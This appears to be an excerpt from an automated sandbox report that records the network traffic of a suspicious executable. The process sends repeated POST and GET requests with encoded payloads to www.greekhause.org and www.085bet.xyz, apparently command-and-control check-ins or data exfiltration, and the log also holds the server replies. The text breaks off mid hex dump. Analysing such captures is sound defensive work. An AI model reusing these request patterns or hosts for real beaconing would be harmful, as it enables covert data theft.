                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:34 GMT
                                Connection: close
                                Content-Length: 5115
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                 Sep 23, 2024 14:39:35.074445009 CEST | 224 | IN | Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
                                 Sep 23, 2024 14:39:35.074450016 CEST | 1236 | IN | Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79
                                Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
                                 Sep 23, 2024 14:39:35.074466944 CEST | 1236 | IN | Data Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65
                                Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
                                 Sep 23, 2024 14:39:35.074480057 CEST | 1236 | IN | Data Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62
                                Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right">
                                 Sep 23, 2024 14:39:35.074487925 CEST | 166 | IN | Data Raw: 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 31 37 37 36 33 22 3e 56 69 65 77 20 6d 6f
                                Data Ascii: .microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 41 | 192.168.2.7 | 49745 | 3.33.130.190 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:40.142749071 CEST | 746 | OUT | POST /gxfy/ HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.greekhause.org
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.greekhause.org/gxfy/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 50 4b 67 36 6b 58 33 69 4e 6a 35 2b 2b 31 64 49 57 6d 32 45 43 31 4a 41 6f 73 57 46 33 4d 51 69 44 4d 42 6f 33 57 4d 37 5a 62 43 4e 76 6b 62 4d 6b 57 69 49 33 31 30 66 6e 2f 44 79 4c 61 66 67 39 6e 67 36 6a 63 51 53 56 4a 4b 35 61 4e 66 56 61 6d 53 65 36 58 39 6e 68 37 34 75 69 2b 48 72 39 63 6b 52 79 2b 33 4f 47 31 34 53 4a 50 42 51 62 50 47 62 77 66 63 4c 32 50 56 2b 4c 7a 37 31 34 61 6a 44 62 38 65 32 57 57 4a 74 45 59 30 2f 72 67 77 52 71 44 34 7a 7a 42 53 68 2f 44 58 73 54 2f 31 62 4b 65 51 59 41 57 75 59 51 51 44 42 70 46 41 34 49 39 31 6b 4a 41 71 61 6c 4a 48 46 70 37 74 35 36 59 30 6d 6e 49 53 45 56 59 67 5a 66 51 3d 3d
                                Data Ascii: 76=PKg6kX3iNj5++1dIWm2EC1JAosWF3MQiDMBo3WM7ZbCNvkbMkWiI310fn/DyLafg9ng6jcQSVJK5aNfVamSe6X9nh74ui+Hr9ckRy+3OG14SJPBQbPGbwfcL2PV+Lz714ajDb8e2WWJtEY0/rgwRqD4zzBSh/DXsT/1bKeQYAWuYQQDBpFA4I91kJAqalJHFp7t56Y0mnISEVYgZfQ==


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 42 | 192.168.2.7 | 49746 | 3.33.130.190 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:42.692054987 CEST | 766 | OUT | POST /gxfy/ HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.greekhause.org
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.greekhause.org/gxfy/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 50 4b 67 36 6b 58 33 69 4e 6a 35 2b 2f 55 74 49 55 46 75 45 54 56 4a 44 6b 4d 57 46 2b 73 51 63 44 4d 64 6f 33 58 4a 67 5a 4a 6d 4e 32 42 2f 4d 6c 53 2b 49 30 31 30 66 73 66 44 33 49 71 66 52 39 6e 6b 79 6a 5a 6f 53 56 4a 32 35 61 4a 62 56 5a 52 6d 52 6f 58 39 66 70 62 34 2f 74 65 48 72 39 63 6b 52 79 2b 7a 30 47 31 41 53 4a 2f 78 51 55 4f 48 4e 35 2f 63 49 33 50 56 2b 47 54 36 79 34 61 6a 71 62 35 47 4d 57 55 78 74 45 59 45 2f 72 31 4d 57 68 44 34 31 75 52 54 65 76 54 47 33 62 76 64 54 4e 73 41 47 47 6d 6d 5a 52 6d 65 6a 7a 6e 4d 55 57 73 4e 66 4e 43 4f 73 79 76 61 77 72 36 70 68 33 36 41 48 34 2f 33 75 59 4b 42 64 4a 67 76 42 70 6d 35 46 75 45 50 54 70 51 59 6a 75 52 65 50 4c 6e 34 3d
                                Data Ascii: 76=PKg6kX3iNj5+/UtIUFuETVJDkMWF+sQcDMdo3XJgZJmN2B/MlS+I010fsfD3IqfR9nkyjZoSVJ25aJbVZRmRoX9fpb4/teHr9ckRy+z0G1ASJ/xQUOHN5/cI3PV+GT6y4ajqb5GMWUxtEYE/r1MWhD41uRTevTG3bvdTNsAGGmmZRmejznMUWsNfNCOsyvawr6ph36AH4/3uYKBdJgvBpm5FuEPTpQYjuRePLn4=


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 43 | 192.168.2.7 | 49747 | 3.33.130.190 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:45.384926081 CEST | 1779 | OUT | POST /gxfy/ HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.greekhause.org
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.greekhause.org/gxfy/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 50 4b 67 36 6b 58 33 69 4e 6a 35 2b 2f 55 74 49 55 46 75 45 54 56 4a 44 6b 4d 57 46 2b 73 51 63 44 4d 64 6f 33 58 4a 67 5a 4a 75 4e 71 6e 6a 4d 6b 7a 2b 49 31 31 30 66 68 2f 44 32 49 71 66 49 39 6a 41 32 6a 5a 73 6f 56 4d 36 35 61 73 50 56 59 6c 36 52 79 48 39 66 72 62 34 76 69 2b 47 7a 39 66 4d 56 79 2b 6a 30 47 31 41 53 4a 38 70 51 54 66 48 4e 31 66 63 4c 32 50 56 69 4c 7a 36 57 34 61 37 62 62 34 7a 78 52 6b 52 74 45 38 6f 2f 75 48 6b 57 73 44 34 33 76 52 54 47 76 54 4b 53 62 76 41 6f 4e 74 30 34 47 68 71 5a 54 79 44 4c 33 45 6b 66 44 39 31 2b 45 44 75 36 39 35 79 50 70 35 39 44 39 4e 77 46 6c 50 4b 4b 63 4a 5a 6d 4d 6d 48 43 79 56 31 56 6f 6d 76 30 6d 48 35 35 2b 68 43 2f 49 77 4d 59 45 6d 70 67 6d 6d 57 6b 49 6b 42 38 2f 75 37 4c 37 6f 47 4a 67 57 55 74 7a 6f 41 47 33 70 33 7a 57 79 47 51 47 63 77 77 53 4b 62 6d 4a 59 55 35 4a 76 63 59 33 50 65 66 51 44 73 67 46 49 4c 53 68 57 52 78 39 45 35 51 75 45 4b 68 7a 4a 4b 72 30 53 49 30 46 52 38 6a 54 58 6e 61 57 75 63 73 54 4f 42 50 4e 63 54 [TRUNCATED]
                                 Data Ascii: 76= [TRUNCATED]


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 44 | 192.168.2.7 | 49748 | 3.33.130.190 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:47.920305014 CEST | 479 | OUT | GET /gxfy/?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                 Sep 23, 2024 14:39:48.399159908 CEST | 412 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Mon, 23 Sep 2024 12:39:48 GMT
                                Content-Type: text/html
                                Content-Length: 272
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 36 3d 43 49 49 61 6e 68 48 52 4d 67 4e 6f 7a 6b 73 35 52 47 66 4a 64 55 4e 58 33 2b 65 6d 7a 62 67 4e 66 2f 56 50 37 6b 52 73 4e 36 76 4e 30 57 7a 4d 76 47 33 47 39 55 49 67 2b 38 6a 69 4a 4b 76 75 72 43 41 68 30 63 38 65 41 4e 79 32 51 38 62 64 65 58 79 52 34 53 74 43 6d 6f 4a 63 6a 66 7a 47 35 70 49 6d 33 75 2b 4f 50 51 38 53 47 34 78 54 55 50 6e 46 78 4f 38 63 2b 2b 42 6b 49 79 44 79 67 64 62 74 61 37 65 6a 59 54 35 67 26 6d 74 4a 44 5f 3d 66 76 64 6c 4a 32 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L"}</script></head></html>


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 45 | 192.168.2.7 | 49749 | 154.198.53.36 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Sep 23, 2024 14:39:53.632194996 CEST | 734 | OUT | POST /1zd7/ HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.085bet.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.085bet.xyz/1zd7/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 57 41 64 34 4c 6d 4f 56 69 4b 6b 45 46 6a 4c 4e 6f 4d 4a 6a 72 36 66 63 59 2b 49 4a 6f 34 63 2f 7a 38 47 71 73 47 48 5a 52 42 4e 56 31 73 45 31 68 66 55 50 4e 76 71 48 4e 4f 73 44 70 49 51 35 45 4f 44 4e 49 77 41 37 50 6b 2f 35 4e 4f 38 5a 45 63 64 59 72 39 58 70 37 34 74 5a 42 35 6f 37 45 35 75 36 34 4f 57 4a 47 49 4d 55 43 56 44 55 54 56 43 58 5a 54 61 4b 6a 44 54 56 54 6b 77 46 58 34 6f 73 70 54 79 4b 36 78 73 63 36 64 79 62 4d 57 71 42 2f 72 62 6f 74 77 4a 4f 75 47 65 44 34 2f 2f 4b 57 30 47 69 62 51 2b 56 61 69 4c 7a 5a 2b 36 7a 44 69 2f 6b 30 62 63 4d 65 33 59 79 6d 6d 38 50 74 76 79 59 65 2f 5a 7a 39 6f 66 30 42 77 3d 3d
                                Data Ascii: 76=WAd4LmOViKkEFjLNoMJjr6fcY+IJo4c/z8GqsGHZRBNV1sE1hfUPNvqHNOsDpIQ5EODNIwA7Pk/5NO8ZEcdYr9Xp74tZB5o7E5u64OWJGIMUCVDUTVCXZTaKjDTVTkwFX4ospTyK6xsc6dybMWqB/rbotwJOuGeD4//KW0GibQ+VaiLzZ+6zDi/k0bcMe3Yymm8PtvyYe/Zz9of0Bw==
                                Sep 23, 2024 14:39:54.540385962 CEST | 729 | IN | HTTP/1.1 405 Method Not Allowed
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:39:54 GMT
                                Server: openresty
                                X-Cache: BYPASS
                                Content-Length: 556
                                Connection: close
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                46 | 192.168.2.7 | 49750 | 154.198.53.36 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:39:56.205401897 CEST | 754 | OUT | POST /1zd7/ HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.085bet.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.085bet.xyz/1zd7/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=WAd4LmOViKkEUzbNvtJjpafTGuIJmYckz8KqsErzRUlV0N01gbAPIvqHGusK34QuEOPvI147Pgv5NM0ZEtdXttXrzYtXLZo7E5u64OTiGIEUCFTUSxWURzaJgDTVZEwJX4p5pSuz6yUc6cibMCGC2rbuhgIxtELL/9SoVCz/ezyFbUWRDc2fdzHfwZ46JRFHkn4XgNG5BI8Zw6+wXBDboXNIKoNVKUHx91RLxEU=
                                Sep 23, 2024 14:39:57.104795933 CEST | 729 | IN | HTTP/1.1 405 Method Not Allowed
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:39:56 GMT
                                Server: openresty
                                X-Cache: BYPASS
                                Content-Length: 556
                                Connection: close
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                47 | 192.168.2.7 | 49751 | 154.198.53.36 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:39:58.801799059 CEST | 1767 | OUT | POST /1zd7/ HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.085bet.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.085bet.xyz/1zd7/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:39:59.933331966 CEST | 729 | IN | HTTP/1.1 405 Method Not Allowed
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:39:59 GMT
                                Server: openresty
                                X-Cache: BYPASS
                                Content-Length: 556
                                Connection: close
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                48 | 192.168.2.7 | 49752 | 154.198.53.36 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:40:01.342526913 CEST | 475 | OUT | GET /1zd7/?76=bC1YIRSSuZYlVnS9hsNuhorKbcQ6ntdnx8KhpmCqECpWzN5SjPNMNLi+QdUYzo4UT/zMJg8CHwvIOMobHOZol4uZ599UMLQvIcSN6ebgMaMOQVLVUFO0QXCtqgKNb3wKU9pkkDiIxWQO&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:40:02.265130997 CEST | 1236 | IN | HTTP/1.1 200 OK
                                Access-Control-Allow-Origin: *
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:40:02 GMT
                                Server: openresty
                                Vary: Accept-Encoding
                                X-Cache: BYPASS
                                Connection: close
                                Transfer-Encoding: chunked
                                Data Ascii: 1f1e<!DOCTYPE html><html lang="zh-CN" data-buildtime="7/14/2024, 21:27:27"> <head> <meta charset="utf-8"> <title></title> <meta name="next-font-preconnect"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="Content-Language" content="zh-CN"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="theme-color" content="#fff"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-touch-fullscreen" content="yes"> <meta name="referrer" content="origin"> <meta name="x5-orientation" content="portrait"> <meta name="google" content="notranslate"> <meta name="screen-orientation" content="portrait"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover"> ... --> <style> .con { width: 100% [TRUNCATED]
                                Sep 23, 2024 14:40:02.265156031 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 63 6d 73 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 20 20
                                Data Ascii: height: 100%; background: var(--cms-primary-background-color); position: fixed; left: 0; top: 0; display: flex; justify-content: center; align-items: center; } .loading {
                                Sep 23, 2024 14:40:02.265162945 CEST | 1236 | IN | Data Raw: 20 20 20 20 2e 61 6e 74 69 63 6f 6e 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 2c 0a 20 20 20 20 20 20 2e 61 6e 74 69 63 6f 6e 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 20 7b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f
                                Data Ascii: .anticon-exclamation-circle, .anticon-check-circle { display: none !important; } .ant-message-error .anticon { background: #cf2f22 !important; color: white !important; border-radius: 16px;
                                Sep 23, 2024 14:40:02.265726089 CEST | 672 | IN | Data Raw: 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 20 28 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 20 22 5f 54 5f 22 2c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 66 69 67 75 72 61
                                Data Ascii: () : (t.defineProperty(t.prototype, "_T_", { configurable: !0, get: e, }), _T_)); })(Object); </script> <script> window.CONFIG={"name":"kc352-1","
                                Sep 23, 2024 14:40:02.265733957 CEST | 1236 | IN | Data Raw: 61 74 69 6f 6e 22 3a 22 6d 69 6e 65 22 7d 5d 2c 22 6d 6f 62 69 6c 65 4d 69 6e 65 53 77 69 74 63 68 4c 69 73 74 22 3a 5b 22 67 72 78 78 22 2c 22 67 72 7a 6c 22 2c 22 77 64 78 78 22 2c 22 7a 6a 6d 78 22 2c 22 63 7a 64 64 22 2c 22 74 78 64 64 22 2c
                                Data Ascii: ation":"mine"}],"mobileMineSwitchList":["grxx","grzl","wdxx","zjmx","czdd","txdd","zdxq","sssz","ssgg","bsjg","zzxx","dlzq","yuebao","jiebei"],"sportConfig":{"svgSpriteName":"template_2","templateName":"template_2"},"isAgent":false}; </scr
                                Sep 23, 2024 14:40:02.265742064 CEST | 1236 | IN | Data Raw: 6e 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e
